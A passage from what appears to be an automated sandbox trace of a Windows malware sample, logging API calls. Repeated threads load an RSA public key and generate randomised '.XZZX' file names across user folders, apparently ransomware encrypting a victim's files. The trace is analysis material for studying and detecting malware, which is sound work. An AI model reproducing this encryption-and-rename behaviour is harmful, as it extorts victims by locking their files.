param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\E19389473B676C797B8F3FA93E4250C1.XZZX") returned 100 [0236.225] StrStrW (lpFirst="7B7BA3C4205941180FE9457124712560.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 923 os_tid = 0x1174 [0236.382] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0236.382] lstrcpyW (in: lpString1=0x2daf460, lpString2="7BA753503E40D4C00F297B124258B908.XZZX" | out: lpString1="7BA753503E40D4C00F297B124258B908.XZZX") returned="7BA753503E40D4C00F297B124258B908.XZZX" [0236.382] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" [0236.382] SetErrorMode (uMode=0x1) returned 0x1 [0236.383] lstrcpyW (in: lpString1=0x2daf860, lpString2="7BA753503E40D4C00F297B124258B908.XZZX" | out: lpString1="7BA753503E40D4C00F297B124258B908.XZZX") returned="7BA753503E40D4C00F297B124258B908.XZZX" [0236.383] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x33d906f8, Data2=0x50f3, Data3=0x43fd, Data4=([0]=0xbb, [1]=0x54, [2]=0xa3, [3]=0xb3, [4]=0xac, [5]=0xb6, [6]=0x29, [7]=0xff))) returned 0x0 [0236.383] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\7BA753503E40D4C00F297B124258B908.XZZX") returned 95 [0236.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0236.383] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\092F1D68157F992733D906F8185A7D6F.XZZX") returned 95 [0236.383] StrStrW (lpFirst="7BA753503E40D4C00F297B124258B908.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 924 os_tid = 0x1178 [0236.535] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0236.535] lstrcpyW (in: lpString1=0x2daf460, lpString2="4645E01C4F3CCEC4EA018E655354B30C.XZZX" | out: lpString1="4645E01C4F3CCEC4EA018E655354B30C.XZZX") returned="4645E01C4F3CCEC4EA018E655354B30C.XZZX" [0236.535] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" [0236.535] SetErrorMode (uMode=0x1) returned 0x1 [0236.536] lstrcpyW (in: lpString1=0x2daf860, lpString2="4645E01C4F3CCEC4EA018E655354B30C.XZZX" | out: lpString1="4645E01C4F3CCEC4EA018E655354B30C.XZZX") returned="4645E01C4F3CCEC4EA018E655354B30C.XZZX" [0236.536] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x6d497ca1, Data2=0xa312, Data3=0x41ef, Data4=([0]=0xa6, [1]=0xea, [2]=0x86, [3]=0x82, [4]=0x98, [5]=0x93, [6]=0x84, [7]=0x3f))) returned 0x0 [0236.536] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\4645E01C4F3CCEC4EA018E655354B30C.XZZX") returned 81 [0236.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0236.536] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\7985465229FFCFCE6D497CA12CDAB416.XZZX") returned 81 [0236.536] StrStrW (lpFirst="4645E01C4F3CCEC4EA018E655354B30C.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 925 os_tid = 0x117c [0236.691] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0236.691] lstrcpyW (in: lpString1=0x2daf460, lpString2="72A6C9432269CCE1A510518B2681B129.XZZX" | out: lpString1="72A6C9432269CCE1A510518B2681B129.XZZX") returned="72A6C9432269CCE1A510518B2681B129.XZZX" [0236.691] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0236.691] SetErrorMode (uMode=0x1) returned 0x1 [0236.691] lstrcpyW (in: lpString1=0x2daf860, lpString2="72A6C9432269CCE1A510518B2681B129.XZZX" | out: lpString1="72A6C9432269CCE1A510518B2681B129.XZZX") returned="72A6C9432269CCE1A510518B2681B129.XZZX" [0236.691] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x11ef0c3b, Data2=0x8afe, Data3=0x4540, Data4=([0]=0x80, [1]=0x9d, [2]=0x21, [3]=0xd9, [4]=0xa2, [5]=0x82, [6]=0x34, [7]=0x7a))) returned 0x0 [0236.691] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\72A6C9432269CCE1A510518B2681B129.XZZX") returned 81 [0236.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0236.691] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\A7C5F08A2599358011EF0C3B287419C8.XZZX") returned 81 [0236.691] StrStrW (lpFirst="72A6C9432269CCE1A510518B2681B129.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 926 os_tid = 0x1180 [0236.847] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0236.847] lstrcpyW (in: lpString1=0x2daf460, lpString2="15DC3754190A8EA84ED7A99B1D2272F0.XZZX" | out: lpString1="15DC3754190A8EA84ED7A99B1D2272F0.XZZX") returned="15DC3754190A8EA84ED7A99B1D2272F0.XZZX" [0236.847] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0236.847] SetErrorMode (uMode=0x1) returned 0x1 [0236.847] lstrcpyW (in: lpString1=0x2daf860, lpString2="15DC3754190A8EA84ED7A99B1D2272F0.XZZX" | out: lpString1="15DC3754190A8EA84ED7A99B1D2272F0.XZZX") returned="15DC3754190A8EA84ED7A99B1D2272F0.XZZX" [0236.847] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xf6ccdf36, Data2=0x4d87, Data3=0x4c96, Data4=([0]=0xa3, [1]=0xa, [2]=0xaa, [3]=0x69, [4]=0xf0, [5]=0x78, [6]=0x8c, [7]=0xf4))) returned 0x0 [0236.847] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\15DC3754190A8EA84ED7A99B1D2272F0.XZZX") returned 87 [0236.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0236.847] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\C52CF37A1731811AF6CCDF361A0C6562.XZZX") returned 87 [0236.847] StrStrW (lpFirst="15DC3754190A8EA84ED7A99B1D2272F0.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 927 os_tid = 0x1184 [0237.001] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0237.001] lstrcpyW (in: lpString1=0x2daf460, lpString2="8E5ECE9444DBAF1A59BC413E48F39362.XZZX" | out: lpString1="8E5ECE9444DBAF1A59BC413E48F39362.XZZX") returned="8E5ECE9444DBAF1A59BC413E48F39362.XZZX" [0237.001] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0237.001] SetErrorMode (uMode=0x1) returned 0x1 [0237.001] lstrcpyW (in: lpString1=0x2daf860, lpString2="8E5ECE9444DBAF1A59BC413E48F39362.XZZX" | out: lpString1="8E5ECE9444DBAF1A59BC413E48F39362.XZZX") returned="8E5ECE9444DBAF1A59BC413E48F39362.XZZX" [0237.001] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x71f8510c, Data2=0x2b31, Data3=0x4876, Data4=([0]=0xa3, [1]=0xf, [2]=0x7d, [3]=0x73, [4]=0xb1, [5]=0x3, [6]=0x71, [7]=0xd))) returned 0x0 [0237.001] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\8E5ECE9444DBAF1A59BC413E48F39362.XZZX") returned 87 [0237.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0237.001] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\8624874C0C39B09671F8510C0F1494DE.XZZX") returned 87 [0237.001] StrStrW (lpFirst="8E5ECE9444DBAF1A59BC413E48F39362.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 928 os_tid = 0x1188 [0237.157] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0237.157] lstrcpyW (in: lpString1=0x2baf460, lpString2="B8440918056E9F026EA48C8C0986834A.XZZX" | out: lpString1="B8440918056E9F026EA48C8C0986834A.XZZX") returned="B8440918056E9F026EA48C8C0986834A.XZZX" [0237.157] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0237.157] SetErrorMode (uMode=0x1) returned 0x1 [0237.157] lstrcpyW (in: lpString1=0x2baf860, lpString2="B8440918056E9F026EA48C8C0986834A.XZZX" | out: lpString1="B8440918056E9F026EA48C8C0986834A.XZZX") returned="B8440918056E9F026EA48C8C0986834A.XZZX" [0237.157] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x438d9a53, Data2=0x6e50, Data3=0x428f, Data4=([0]=0x9c, [1]=0x29, [2]=0xb2, [3]=0x65, [4]=0x59, [5]=0x6, [6]=0xb9, [7]=0x9))) returned 0x0 [0237.157] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\B8440918056E9F026EA48C8C0986834A.XZZX") returned 87 [0237.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0237.158] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\F48FE3F01CAE3EB0438D9A531F6922F8.XZZX") returned 87 [0237.158] StrStrW (lpFirst="B8440918056E9F026EA48C8C0986834A.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 929 os_tid = 0x118c [0237.316] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0237.316] lstrcpyW (in: lpString1=0x2baf460, lpString2="1844FE2A092A01627C9EB5E50D41E5AA.XZZX" | out: lpString1="1844FE2A092A01627C9EB5E50D41E5AA.XZZX") returned="1844FE2A092A01627C9EB5E50D41E5AA.XZZX" [0237.316] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0237.316] SetErrorMode (uMode=0x1) returned 0x1 [0237.316] lstrcpyW (in: lpString1=0x2baf860, lpString2="1844FE2A092A01627C9EB5E50D41E5AA.XZZX" | out: lpString1="1844FE2A092A01627C9EB5E50D41E5AA.XZZX") returned="1844FE2A092A01627C9EB5E50D41E5AA.XZZX" [0237.316] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xc4e746, Data2=0x5bcb, Data3=0x4da6, Data4=([0]=0xad, [1]=0x64, [2]=0xf8, [3]=0xc6, [4]=0xa, [5]=0xff, [6]=0xfd, [7]=0xe0))) returned 0x0 [0237.316] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\1844FE2A092A01627C9EB5E50D41E5AA.XZZX") returned 100 [0237.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0237.316] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\9A5946821BD794A200C4E7461E9278EA.XZZX") returned 100 [0237.316] StrStrW (lpFirst="1844FE2A092A01627C9EB5E50D41E5AA.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 930 os_tid = 0x1190 [0237.469] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0237.470] lstrcpyW (in: lpString1=0x2baf460, lpString2="1B49B9E018F35807975DC8201D0B3C4F.XZZX" | out: lpString1="1B49B9E018F35807975DC8201D0B3C4F.XZZX") returned="1B49B9E018F35807975DC8201D0B3C4F.XZZX" [0237.470] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0237.470] SetErrorMode (uMode=0x1) returned 0x1 [0237.470] lstrcpyW (in: lpString1=0x2baf860, lpString2="1B49B9E018F35807975DC8201D0B3C4F.XZZX" | out: lpString1="1B49B9E018F35807975DC8201D0B3C4F.XZZX") returned="1B49B9E018F35807975DC8201D0B3C4F.XZZX" [0237.470] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xcd4445b4, Data2=0x8353, Data3=0x4a2a, Data4=([0]=0xa3, [1]=0xcc, [2]=0x3a, [3]=0xf6, [4]=0x79, [5]=0x31, [6]=0x2d, [7]=0x2f))) returned 0x0 [0237.470] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\1B49B9E018F35807975DC8201D0B3C4F.XZZX") returned 100 [0237.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0237.470] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\7CCDB55C260B899ECD4445B428C66DE6.XZZX") returned 100 [0237.470] StrStrW (lpFirst="1B49B9E018F35807975DC8201D0B3C4F.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 931 os_tid = 0x1194 [0237.626] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC 